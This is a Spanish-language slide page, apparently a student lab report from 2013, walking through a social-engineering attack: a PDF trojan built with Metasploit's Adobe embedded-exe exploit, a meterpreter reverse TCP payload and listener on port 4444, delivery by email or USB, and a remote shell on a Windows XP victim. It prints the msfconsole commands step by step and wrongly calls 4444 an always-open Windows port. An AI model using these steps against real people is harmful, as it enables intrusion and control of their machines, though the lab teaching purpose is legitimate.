Descargar para leer sin conexión
Subido porFrancesc Perez
Seguridad: Backtrack1
Este documento describe un ataque de ingeniería social mediante un archivo PDF infectado que abre una puerta trasera en un sistema Windows. El atacante crea el PDF malicioso usando msfconsole de BackTrack y establece una escucha en el puerto 4444. Luego envía el PDF a la víctima. Cuando la víctima abre el PDF, se conecta de forma inversa al atacante a través del puerto 4444, permitiendo al atacante ejecutar comandos en el sistema de la víctima a través de una shell remota.
Más contenido relacionado
Seguridad: Backtrack1
- 1. ATAQUE PDF Eduard Angrill Prácticade seguridad, donde se realiza un ataque por ingeniería social en combinación con un troyano o backdoor. SEGURIDAD Y ALTA DISPONIBILIDAD STUCOM 20/11/2013
- 2. Introducción: En esta prácticamediante un PDF infectado abriremos un puerto de escucha en un equipo Windows XP que debe tener la versión 9 de Adobe PDF o una inferior, en versiones superiores el error que nos permite abrir el puerto ya está corregido y accederemos a su sistema. Back Track Al Omitir los riegos Víctima Petición TCP Puerto: 4444 Paso 1: Crear el fichero PDF mediante el programa "msfconsole" de Backtrack v5. Usa un exploit de Windows adobe pdf: use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs Incluye el payload "reverse_tcp" (para una conexión "invertida" de tcp): set payload windows/meterpreter/reverse_tcp Añade la dirección del local host, el nombre del fichero y genera el exploit: set lhost 192.168.72.200 set filename Xllegir.pdf exploit 2
- 3. Paso 2: Una vezel fichero ya está creado podemos acceder a él mediante la siguiente ruta: /root/.msf4/local/Xllegir.pdf Ahora tenemos que activar un servicio de escucha para recibir las peticiones de conexión invertidas, para cuando la víctima abra el PDF y acepte el aviso de PDF potencialmente peligroso: En este caso hacemos uso del exploit "handler": use exploit/multi/handler Le añadimos el payload de "reverse_tcp" para indicar el modo de recepción: set payload windows/meterpreter/reverse_tcp Y añadimos la IP del host local: set lhost 192.168.1.3 exploit Mensaje: "Starting the payload handler..." hasta que el usuario abra el PDF y reciba la conexión. 3
- 4. Ahora se tieneque pasar el PDF a la victima mediante un correo o USB: Ahora está en modo de escucha hasta que el usuario victima ejecute el PDF omitiendo las advertencias que le realiza el propio Adobe y finalmente se conecte con el servidor: 1. 2. 3. 1. Como se puede ver la víctima "192.168.72.201" se ha conectado mediante el puerto 4444 (un puerto de Windows que siempre está abierto). 2. sysinfo: para ver la información del sistema. 3. shell: abre un terminal dentro del equipo infectado. 4